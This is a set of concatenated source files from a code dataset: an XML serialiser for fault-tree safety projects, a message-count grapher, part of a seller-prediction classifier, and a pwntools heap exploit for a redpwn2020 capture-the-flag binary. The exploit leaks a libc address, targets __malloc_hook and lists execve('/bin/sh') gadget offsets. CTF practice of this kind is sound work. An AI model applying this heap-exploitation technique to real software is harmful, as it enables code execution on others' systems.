info.GateDescriptionTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_GateDescription.text = pS(str(each_FTEvent.GateDescription))\n\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ShowDescriptionComments = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate, info.ShowDescriptionCommentsTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ShowDescriptionComments.text = pS(str(each_FTEvent.ShowDescriptionComments))\n\n\t\t\t\t\t\tif len(each_FTEvent.ActionItems) > 0:\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ActionItems = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate, info.ActionItemsTag)\n\t\t\t\t\t\t\t# J:since AssociatedTextItem does not have an ID, match core_classes.Comment instead\n\t\t\t\t\t\t\teach_ActionItem: core_classes.Comment\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ActionItems.text = pS(','.join(list(map(lambda each_ActionItem: each_ActionItem.ID, each_FTEvent.ActionItems))))
\n\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ShowActionItems = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate, info.ShowActionItemsTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ShowActionItems.text = pS(str(each_FTEvent.ShowActionItems))
\n\n\t\t\t\t\tif type(each_FTEvent) == faulttree.FTConnectorItemInCore:\n\t\t\t\t\t\t#TODO J: In Out should be determined by flag Out: faulttree.FTConnectorItemInCore.Out?\n\n\t\t\t\t\t\teach_FTEvent: faulttree.FTConnectorItemInCore\n\t\t\t\t\t\tif (each_FTEvent.Out):\n\t\t\t\t\t\t\t# FTConnectorOut\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column, info.FTConnectorOutTag)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t# FTConnectorIn\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column, info.FTConnectorInTag)\n\n\t\t\t\t\t\t# ID\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ID = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.IDTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ID.text = pS(str(each_FTEvent.ID))\n\n\t\t\t\t\t\t# ConnectorDescription\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ConnectorDescription = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.ConnectorDescriptionTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ConnectorDescription.text = pS(str(each_FTEvent.ConnectorDescription))\n\n\t\t\t\t\t\t# ConnectorDescriptionComments\n\t\t\t\t\t\tif len(each_FTEvent.ConnectorDescriptionComments) > 0:\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ConnectorDescriptionComments = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector,info.ConnectorDescriptionCommentsTag)\n\t\t\t\t\t\t\t# J:since AssociatedTextItem does not have an ID, match core_classes.Comment instead\n\t\t\t\t\t\t\teach_ConnectorDescriptionComment: core_classes.Comment\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ConnectorDescriptionComments.text = pS(','.join(list(map(lambda each_ConnectorDescriptionComment: each_ConnectorDescriptionComment.ID,each_FTEvent.ConnectorDescriptionComments))))
\n\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ShowDescriptionComments = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.ShowDescriptionCommentsTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ShowDescriptionComments.text = pS(str(each_FTEvent.ShowDescriptionComments))\n\n\t\t\t\t\t\t# BackgColour\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_BackgColour = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.BackgColourTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_BackgColour.text = pS(str(each_FTEvent.BackgColour))\n\n\t\t\t\t\t\tif(each_FTEvent.Out):\n\n\t\t\t\t\t\t\tpass\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t#RelatedConnector\n\t\t\t\t\t\t\tif each_FTEvent.RelatedCX is not None:\n\t\t\t\t\t\t\t\teach_FTEvent.RelatedCX: 
faulttree.FTConnectorItemInCore\n\t\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_RelatedConnector = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.RelatedConnectorTag)\n\t\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_RelatedConnector.text = pS(str(each_FTEvent.RelatedCX.ID))\n\n\t\t\t\t\t\t\t#ConnectTo\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ConnectTo = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.ConnectToTag)\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ConnectTo.text = pS(','.join(list(map(lambda each_ConnectedItem: each_ConnectedItem.ID, each_FTEvent.ConnectTo))))
\n\n\t\t\t\t\t\t#Numbering\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_Numbering = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.NumberingTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_Numbering.text = pS(str(each_FTEvent.NumberingID))
\n\n\t\t\t\t\t\t#Style\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_Style = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.StyleTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_Style.text = pS(str(each_FTEvent.Style))\n\n\t\t\t\t\t\t#RiskReceptors\n\t\t\t\t\t\tif len(each_FTEvent.ApplicableRiskReceptors) > 0:\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_RiskReceptors = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.RiskReceptorsTag)\n\t\t\t\t\t\t\teach_RiskReceptor: core_classes.RiskReceptorItem\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_RiskReceptors.text = pS(','.join(list(map(lambda each_RiskReceptor: each_RiskReceptor.ID,each_FTEvent.ApplicableRiskReceptors))))
\n\n\t\t\t#TolRiskModel\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TolRiskModel = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.TolRiskModelTag)\n\t\t\teach_FaultTree.MyTolRiskModel: core_classes.TolRiskModel\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TolRiskModel.text = pS(str(each_FaultTree.MyTolRiskModel.ID))
\n\n\t\t\t#Severity\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_Severity = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.SeverityTag)\n\n\t\t\teach_list_of_keys: core_classes.RiskReceptorItem\n\t\t\tfor each_list_of_keys in each_FaultTree.Severity:\n\t\t\t\t# RR\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Severity_RR = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Severity, info.RRTag)\n\t\t\t\t# Name\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Severity_RR_Name = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Severity_RR, info.NameTag)\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Severity_RR_Name.text = pS(each_list_of_keys.XMLName)\n\t\t\t\t# SeverityValue\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Severity_RR_SeverityValue = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Severity_RR, info.SeverityValueTag)\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Severity_RR_SeverityValue.text = pS(str(each_FaultTree.Severity.get(each_list_of_keys)))\n\n\t\t\t\tpass
\n\n\t\t\t#TolFreq\n\t\t\t#TODO\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TolFreq = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.TolFreqTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TolFreq.text = pS(str(each_FaultTree.TolFreq))\n\n\t\t\t#RRGrouping\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_RRGrouping = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.RRGroupingTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_RRGrouping.text = pS(each_FaultTree.RRGroupingOption)
\n\n\t\t\tif len(each_FaultTree.CollapseGroups) > 0:\n\t\t\t\t# CollapseGroups\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_CollapseGroups = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree,info.CollapseGroupsTag)\n\t\t\t\tfor each_CollapseGroup in each_FaultTree.CollapseGroups:\n\t\t\t\t\tassert type(each_CollapseGroup) == faulttree.FTCollapseGroupInCore\n\t\t\t\t\t# CollapseGroup\n\t\t\t\t\teach_CollapseGroup: faulttree.FTCollapseGroupInCore\n\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_CollapseGroup = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_CollapseGroups, info.CollapseGroupTag)\n\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_CollapseGroup.text = pS(str(each_CollapseGroup.ID))
\n\n\t\t\t#ModelGate\n\t\t\tif each_FaultTree.ModelGate is not None:\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_ModelGate = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.ModelGateTag)\n\t\t\t\teach_FaultTree.ModelGate: faulttree.FTGateItemInCore\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_ModelGate.text = pS(str(each_FaultTree.ModelGate.ID))\n\n\t\t\tpass
\n\n\t#Comment\n\tif len(Proj.Comments) > 0:\n\t\tMyXMLRoot_Comments = ET.SubElement(MyXMLRoot, info.CommentsTag)\n\n\t\teach_Comment: core_classes.Comment\n\t\tfor each_Comment in Proj.Comments:\n\t\t\tassert type(each_Comment) == core_classes.Comment\n\t\t\tMyXMLRoot_Comments_Comment = ET.SubElement(MyXMLRoot_Comments,info.CommentTag)\n\n\t\t\tMyXMLRoot_Comments_Comment_Id = ET.SubElement(MyXMLRoot_Comments_Comment, info.IDTag)\n\t\t\tMyXMLRoot_Comments_Comment_Id.text = pS(str(each_Comment.iD))\n\n\t\t\tMyXMLRoot_Comments_Comment_Content = ET.SubElement(MyXMLRoot_Comments_Comment, info.ContentTag)\n\t\t\tMyXMLRoot_Comments_Comment_Content.text = pS(str(each_Comment.content))\n\n\t\t\tMyXMLRoot_Comments_Comment_isVisible = ET.SubElement(MyXMLRoot_Comments_Comment, info.isVisibleTag)\n\t\t\tMyXMLRoot_Comments_Comment_isVisible.text = pS(str(each_Comment.isVisible))\n\n\t\t\tMyXMLRoot_Comments_Comment_showInReport = ET.SubElement(MyXMLRoot_Comments_Comment, info.showInReportTag)\n\t\t\tMyXMLRoot_Comments_Comment_showInReport.text = pS(str(each_Comment.showInReport))
\n\n\n\n\tpass\n\n\t# later, add more code here to write all PHA objects into the XML tree\n\t# write the XML file\n\n\t# generate tag Id for all element\n\tautoGenerateTagID(MyXMLRoot)\n\n\tMyXMLTree.write(ProjectFilename, encoding=\"UTF-8\", xml_declaration=True)\n\n\t'''\n\t#J: Display XML tree on screen\n\tET.dump(MyXMLTree)\n\t'''\n\tpass\n\n\"\"\" ----------Project > XML----------]\"\"\" \n\n\"\"\"[----------XML > Project---------- \"\"\"\n\n\n\"\"\" ----------XML > Project----------]\"\"\" \n\n\"\"\"[----------TESTING AREA---------- \"\"\"\n\ndef testCheckType(stringInput: str) -> str:\n\tpass
\n\n# Timer decorator - Start\n# Author: Jack Leung\nimport functools\nimport time\ndef timer(func):\n    @functools.wraps(func)  # preserve the wrapped function's name for the log messages\n    def runFunction(*args, **kwargs):\n        beginTime = time.time()\n        print(\"Function {0} is called.\".format(func.__name__))\n        func(*args,**kwargs)\n        endTime = time.time() - beginTime\n        print(\"Function {0} has run for {1} seconds.\".format(func.__name__, endTime))\n    return runFunction\n# Timer decorator - End\n\n\"\"\" ----------TESTING AREA----------]\"\"\" \n\n\"\"\"[----------RUN MAIN PROGRAM---------- \"\"\"\n@timer\ndef main():\n\tprojects.runUnitTest()\n\tpass\n\nif __name__ == '__main__':\n\tmain()\n\"\"\" ----------RUN MAIN PROGRAM----------]\"\"\" 
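# A minimal, self-contained sketch of the ElementTree pattern used throughout
# convertProjectToXml above: build the tree top-down with nested ET.SubElement
# calls, stamp every node with a TagID (the autoGenerateTagID idea), then write
# the file. Tag names and the output filename here are illustrative only.
import xml.etree.ElementTree as ET

demo_root = ET.fromstring('<vizop_project></vizop_project>')
demo_title = ET.SubElement(demo_root, 'ShortTitle')
demo_title.text = 'Demo project'
for i, node in enumerate(demo_root.iter(), start=1):
	node.set('TagID', str(i))  # same idea as autoGenerateTagID
ET.ElementTree(demo_root).write('demo.xml', encoding='UTF-8', xml_declaration=True)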
\n","sub_path":"vizop_parser.py","file_name":"vizop_parser.py","file_ext":"py","file_size_in_byte":35092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"538379841","text":"from pwn import *\n\ndef new(size, contents):\n p.sendlineafter(':', '1')\n p.sendlineafter(':', '0')\n p.sendlineafter(':', str(size))\n p.sendlineafter(':', contents)\n\ndef delete():\n p.sendlineafter(':', '2')\n p.sendlineafter(':', str('0'))\n\ndef show():\n p.sendlineafter(':', '3')\n p.sendlineafter(':', str('0'))\n return p.recvuntil('free}}')\n\ncontext.update(log_level='debug')\np = process('bin/four-function-heap')\n#p = remote('2020.redpwnc.tf', 31774)\n\nnew(300, 'A'*299) #0\ndelete() #1\n\n#dummy chunk\nnew(100, 'B'*99) #2\n\nnew(300, 'C'*299)#3\nfor i in range(8):\n delete() #11\naddr_libc = u64(show().split('{{')[0][-7:-1].ljust(8, '\\x00')) #12\n\n\nlog.info('libc: ' + hex(addr_libc))\noffset_libc = 0x3ebca0\naddr_libc_base = addr_libc - offset_libc\nlog.info('libc: ' + hex(addr_libc_base))\n\n\noffset_mallocHook = 0x3ebc30\naddr_mallocHook = addr_libc_base + offset_mallocHook\nlog.info('__malloc_hook: ' + hex(addr_mallocHook))\n\n\nraw_input('debug:' + str(p.pid))\n#new(300, p64(addr_mallocHook)*(299/8)) \nnew(30, p64(addr_mallocHook)+p64(0)) #13\nnew(300, p64(0xdeadbeefdeadbeef)) #14\n#new(30, 'test')\n'''\n0x4f2c5 execve(\"/bin/sh\", rsp+0x40, environ)\nconstraints:\n rsp & 0xf == 0\n rcx == NULL\n\n0x4f322 execve(\"/bin/sh\", rsp+0x40, environ)\nconstraints:\n [rsp+0x40] == NULL\n\n0x10a38c execve(\"/bin/sh\", rsp+0x70, environ)\nconstraints:\n [rsp+0x70] == NULL\n'''\n\n\np.interactive()\n\n\n","sub_path":"redpwn2020/four-function-heap/ex_failed.py","file_name":"ex_failed.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"91241402","text":"#!/usr/bin/env python3\n\"\"\" Automated Graphing of Facebook Messaging Data \"\"\"\n\nimport json\nimport pprint\nfrom collections import namedtuple, OrderedDict\nimport os\nimport datetime\nfrom dateutil.parser import parse\nimport pickle as pkl\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as pyplot\nimport matplotlib.dates as mdates\nfrom matplotlib import cm\n\n__author__ = \"Rohan Pandit\"\n__copyright__ = \"Copyright {0}\".format(datetime.date.today().year)\n\npp = pprint.PrettyPrinter(indent=4)\n\nMessage = namedtuple(\"Message\", ['person', 'timestamp', 'content'])\n\ndef main():\n\tos.chdir(\"Messages\")\n\n\t\"\"\"\n\tmessages = loadMessages()\n\tmessages += loadHangouts()\n\tmessages += loadHangouts('2')\n\tpkl.dump(messages, open(\"../messages.pkl\", 'wb'))\n\t\"\"\"\n\n\tmessages = pkl.load(open(\"../messages.pkl\", 'rb'))\n\tprint(\"Total Messages: \", len(messages), \"\\n\")\n\n\tstart_date = parse('7/26/14')\n\tend_date = parse('6/20/15')\n\tdelta = (end_date - start_date).days\n\t\n\tpeople_msgs = {}\n\n\tfor msg in messages:\n\t\tif msg.person in people_msgs.keys():\n\t\t\tif start_date < msg.timestamp < end_date:\n\t\t\t\tidx = (msg.timestamp - start_date).days\n\t\t\t\tpeople_msgs[msg.person][idx] += 1\n\t\telse:\n\t\t\tpeople_msgs[msg.person] = np.zeros(delta)\n\n\tpeople_msgs = OrderedDict( sorted(people_msgs.items(), key=lambda i: -sum(i[1])) )\n\n\tdata = pd.DataFrame(people_msgs, index=pd.date_range(start_date, periods=delta))\n\ttop10 = data.iloc[:,:15]\n\tprint(top10.describe())\n\tmean = data.mean().sum()\n\tprint(\"Mean: \", mean)\t\n\n\ttoPlot = 
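# A quick sanity check of the leak arithmetic in the four-function-heap exploit
# above: after the tcache is filled, the unsorted-bin leak points into libc's
# main_arena, so subtracting the fixed offset must land on a page-aligned libc
# base. The leaked value below is a made-up example; the offset is the one the
# exploit script uses.
leak = 0x7f1234debca0                 # hypothetical leaked main_arena pointer
offset_libc = 0x3ebca0                # same offset as in the exploit above
addr_libc_base = leak - offset_libc   # -> 0x7f1234a00000
assert addr_libc_base & 0xfff == 0    # a real libc base is page-aligned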
cumMsgPlot(data, 10)\n\t\n\tax = toPlot.plot(title=\"Cumulative Messaging Data (Top 10)\")\n\n\tpyplot.show()\n\tplotTotalMessages(messages, start_date, end_date)\n\ndef cumMsgPlot(data, x):\n\tsum_data = data.apply(np.cumsum)\n\treturn sum_data.iloc[:,:x]\n\ndef totalMsgsTopXPlot(data, x): #bar graph\n\tsum_data = data.iloc[:,:x].sum(axis=0)\n\treturn sum_data\n\ndef numTalkedToPlot(data, min_messages=1, rolling=1):\n\ttalkedTo = data[ min_messages > data ]\n\ttalkedTo = pd.isnull(talkedTo)\n\ttoPlot = talkedTo.iloc[:,:].sum(axis=1)\n\treturn pd.rolling_mean(toPlot, rolling)\n\ndef topXPlot(data, x, rolling=1):\n\tothers = data.iloc[:,:x].sum(axis=1)\n\ttop = data.iloc[:,x:]\n\ttop['Other'] = others\n\treturn pd.rolling_mean(top, rolling)\n\ndef everyonePlot(data, rolling=1):\n\tsum_data = data.iloc[:,:].sum(axis=1)\n\treturn pd.rolling_mean(sum_data, rolling)\n\ndef loadMessages():\n\tdecoded_jsons = []\n\tfor _id in os.listdir():\n\t\tif _id[0] != '.' and _id[0] != '_' and _id[0] != 'H' and _id[0] != 'm': \n\t\t\ttry:\n\t\t\t\tencoded_jsons = open(_id + \"/0-40000.json\",\"r\").read()\n\t\t\texcept FileNotFoundError:\n\t\t\t\ttry:\n\t\t\t\t\tencoded_jsons = open(_id + \"/0-23000.json\",\"r\").read()\t\n\t\t\t\texcept FileNotFoundError:\n\t\t\t\t\tprint(\"exception! \", _id)\n\n\t\t\tdecoded_jsons += json.loads(encoded_jsons)[\"payload\"][\"actions\"]\n\n\n\tprint(\"Total FB Messages: \", len(decoded_jsons))\n\tmessages = []\n\n\tfor decoded_json in decoded_jsons:\n\n\t\tif str(decoded_json['other_user_fbid']) in people.keys():\n\t\t\tperson = getPerson(decoded_json['other_user_fbid'])\n\t\telse:\n\t\t\tperson = str(decoded_json['other_user_fbid'])\n\t\t\tif person == 'None':\n\t\t\t\tperson = decoded_json['author'][5:]\n\t\t\t\tif str(person) in people.keys():\n\t\t\t\t\tperson = getPerson(person)\n\t\ttry:\n\t\t\ttimestamp = parse(decoded_json['timestamp_datetime'])\n \t\t\t#TODO: Fix dates for last week \n\t\texcept ValueError:\n\t\t\ttimestamp = parseDate(decoded_json['timestamp_datetime'])\n\t\ttry:\n\t\t\tcontent = decoded_json['body']\n\t\texcept KeyError:\n\t\t\tcontent = \"\"\n\n\t\tif person == 'None':\n\t\t\tpp.pprint(decoded_json)\n\t\t\tquit()\n\n\t\tmessages.append(Message(person, timestamp, content))\n\n\treturn messages\n\ndef loadHangouts(a=''):\n\tmessages = []\n\tdecoded_json = json.loads(open(\"Hangouts%s.json\"%a).read())\n\n\tlen_convo = lambda i: len(i['conversation_state']['event'])\n\tconvos = sorted(decoded_json[\"conversation_state\"], key=len_convo)\n\n\tfor convo in convos:\n\t\tfor msg in convo[\"conversation_state\"][\"event\"]:\n\t\t\ttry:\n\t\t\t\tperson = getPerson(msg['conversation_id']['id'])\n\t\t\texcept KeyError:\n\t\t\t\tperson = str(msg['conversation_id']['id'])\n\n\t\t\ttimestamp = datetime.datetime.fromtimestamp(int(msg['timestamp'])//1000000)\n\n\t\t\ttry:\n\t\t\t\tcontent = msg['chat_message']['message_content']['segment'][0]['text']\n\t\t\texcept KeyError:\n\t\t\t\tcontent = \"\"\n\n\t\t\tif person == 'UgxG4T1spRtMbhsFK854AaABAQ':\n\t\t\t\tprint(content)\n\n\t\t\tmessages.append(Message(person, timestamp, content))\n\n\tprint(\"Total Hangouts: \", len(messages))\n\treturn messages\n\n\ndef plotTotalMessages(messages, start_date, end_date):\n\tstart_date = parse(start_date)\n\tend_date = parse(end_date)\n\tprint(start_date, end_date)\n\n\trecord = {\"\":0}\n\tdate = \"\"\n\n\tfor msg in messages:\n\t\tmsg_date = \"{0}/{1}/{2}\".format(msg.timestamp.month, msg.timestamp.day, msg.timestamp.year)\n\n\t\tif start_date < parse(msg_date) < 
end_date:\n\n\t\t\tif date == msg_date:\n\t\t\t\trecord[date] += 1\n\t\t\telse:\n\t\t\t\told_date = date\n\t\t\t\tdate = msg_date\n\n\t\t\t\tif date in record.keys():\n\t\t\t\t\trecord[date] += 1\n\t\t\t\telse:\n\t\t\t\t\trecord[date] = 1\n\n\trecord = OrderedDict( sorted( record.items(), key=lambda t: int(parse(t[0]).strftime(\"%s\")) ) )\n\n\tdates = list(map(parse, list(record.keys())))\n\tnumMessages = list(record.values())\n\t\n\tyears = mdates.YearLocator()\n\tmonths = mdates.MonthLocator()\n\tyearsFormat = mdates.DateFormatter('%Y')\n\n\tfig, ax = pyplot.subplots()\n\tax.plot(dates, numMessages)\n\n\t\"\"\"\n\t#format ticks\n\tax.xaxis.set_major_locator(years)\n\tax.xaxis.set_major_locator(yearsFormat)\n\tax.xaxis.set_minor_locator(months)\n\n\tax.set_xlim(min(dates), max(dates))\n\n\tax.format_xdata = mdates.DateFormatter('%Y-%m-%d')\n\tax.grid(True)\n\tfig.autofmt_xdate()\n\t\"\"\"\n\n\tpyplot.show()\n\n\t#pp.pprint(record)\n\n############### Utility Functions ################\n\ndef parseDate(timestamp):\n\ttimestamp = timestamp.split(\" \")\n\tif timestamp[0] == \"Today\":\n\t\treturn datetime.date.today()\n\n\ndef getPerson(_id):\n\treturn people[str(_id)]\n\npeople = {\n\t\t#fill this out yourself :)\n\t\t}\n\nif __name__ == \"__main__\": main()\n","sub_path":"grapher.py","file_name":"grapher.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"502696225","text":"\"\"\"Find the similarity between consumption behaviors of sellers\r\nThe trained model is used to predict the probability of selling for each collector.\r\nThe result is written to table likelihood on SQL\r\n\"\"\"\r\nimport sys\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nimport sklearn\r\nfrom sklearn.metrics import fbeta_score, make_scorer\r\nfrom sklearn.metrics import roc_curve, auc, recall_score, accuracy_score\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom imblearn.over_sampling import SMOTE\r\n\r\nfrom connLocalDB import connDB\r\n\r\nclass RfcCV(object):\r\n \"\"\"\r\n Random Forest Classifer Cross Validation Class\r\n Methods:\r\n train_model: update best_parameter and best_model\r\n evaluate: evaluate on test-dataset, return scores\r\n \"\"\"\r\n def __init__(self ):\r\n # parameters for grid search in the cross-validation\r\n self.param_grid = {\r\n 'n_estimators': [600,800],\r\n 'max_depth':[3,4],\r\n 'min_samples_split':[4,6],\r\n 'class_weight':[{0:1,1:2},{0:1,1:4}],\r\n 'random_state':[42]\r\n }\r\n self.best_model = None\r\n self.best_params = {}\r\n\r\n # Calculate and print the total rounds to run for cross-validation\r\n num_test = 1\r\n for key, val in enumerate(self.param_grid):\r\n num_test *= len(val)\r\n print(\"\\nStart to find the best parameters for random forest classifier using cross-validation.\")\r\n print(\"Total test to run: \"+str(num_test))\r\n\r\n def train_model(self, train_features, train_labels):\r\n # Train the model and update self.best_model\r\n rfc = RandomForestClassifier()\r\n # Instantiate the grid search model\r\n scorer = make_scorer(fbeta_score, beta=1)\r\n grid_search = GridSearchCV(estimator = rfc, param_grid = self.param_grid,\r\n cv = 8, n_jobs = -1, verbose = 1,scoring=scorer) # Using k-folds with cv=10\r\n grid_search.fit(train_features, train_labels)\r\n self.best_params = grid_search.best_params_\r\n self.best_model = grid_search.best_estimator_\r\n 
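        # Note: GridSearchCV refits the winning parameter combination on the
        # full training set by default (refit=True), so the best_estimator_
        # stored above is directly usable for predict()/predict_proba() in
        # evaluate() below.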
print('Best parameters for random forest classifier is: ')\r\n        print(str(self.best_params))\r\n\r\n    def evaluate(self, test_features, test_labels):\r\n        \"\"\"\r\n        Evaluate the model performance.\r\n        Plot the ROC curve and return accuracy, recall, and F1.\r\n        \"\"\"\r\n        def plot_roc(test_labels):\r\n            \"\"\"\r\n            Plot ROC curve\r\n            \"\"\"\r\n            y_pred_grd = self.best_model.predict_proba(test_features)[:, 1]\r\n            fpr_rf, tpr_rf, _ = roc_curve(test_labels, y_pred_grd)\r\n            plt.plot(fpr_rf,tpr_rf)\r\n            plt.show()\r\n            print(\"fpr_rf, tpr_rf\")\r\n            print(fpr_rf)\r\n            print(tpr_rf)\r\n\r\n        predictions = self.best_model.predict(test_features)\r\n        plot_roc(test_labels)\r\n        recallScore = sklearn.metrics.recall_score(test_labels, predictions)\r\n        f1Score = sklearn.metrics.f1_score(test_labels, predictions)\r\n\r\n        # Accuracy score\r\n        errors = abs(predictions - test_labels)\r\n        mape = 100 * np.sum(errors)/np.size(errors,0)\r\n        accuracy = 100 - mape\r\n\r\n        print('Model Performance')\r\n        print('Average Error: {:0.4f}.'.format(np.mean(errors)))\r\n        print('Accuracy = {:0.2f}%.'.format(accuracy))\r\n        return accuracy, recallScore, f1Score\r\n\r\n\r\ndef get_data():\r\n    \"\"\"\r\n    Grep data from local SQL database\r\n    :return: DataFrame containing train and test data\r\n    \"\"\"\r\n    engine, _ = connDB()\r\n    features_query = \"\"\"\r\n    SELECT * From features;\r\n    \"\"\"\r\n    # Grep and process data\r\n    features = pd.read_sql_query(features_query, engine, index_col='userId')\r\n    features = features.drop(columns='index')\r\n    features = features.fillna(value=0)\r\n    features['sumFeatures'] = features.iloc[:,:-1].sum(axis=1)\r\n\r\n    # Remove sellers from Ebay\r\n    print(\"Total sellers before removing ebay-migrant is \"+ str(features[features['selling']==1].shape[0]))\r\n    features = features[np.logical_or(features['selling']==0, np.logical_and(features['selling']==1,features['sumFeatures']>=3))]\r\n    print(\"Total sellers after removing ebay-migrant is \"+ str(features[features['selling']==1].shape[0]))\r\n    features = features.drop('sumFeatures',axis=1)\r\n\r\n    # Recent 3-month records for prediction\r\n    features_3month_query = \"\"\"\r\n    select * \r\n    from featuresrecent3month\r\n    \"\"\"\r\n    features_recent_3month = pd.read_sql_query(features_3month_query, engine, index_col='userId')\r\n    features_recent_3month = features_recent_3month.drop(columns='index')\r\n    return features, features_recent_3month\r\n\r\n\r\ndef write_result(result):\r\n    \"\"\"\r\n    Write the predicted selling likelihoods to the local SQL database\r\n    \"\"\"\r\n    engine, _ = connDB()\r\n    result.to_sql('likelihood', engine, if_exists='replace')\r\n\r\n\r\ndef resample_training(X_train, y_train, oversample=False):\r\n    \"\"\"\r\n    oversample: if True, use under-sampling + SMOTE; otherwise use under-sampling only\r\n    :return: the resampled training and test sets.\r\n    \"\"\"\r\n    train_matrix = X_train.join(y_train)\r\n    train_resampled_neg = train_matrix[train_matrix['selling'] == 0].sample(frac=0.01, random_state=42)\r\n    train_resampled_pos = train_matrix[train_matrix['selling'] == 1]\r\n    print(\"Number of sellers in training set is\", str(train_resampled_pos.shape[0]), \"and\", str(\r\n 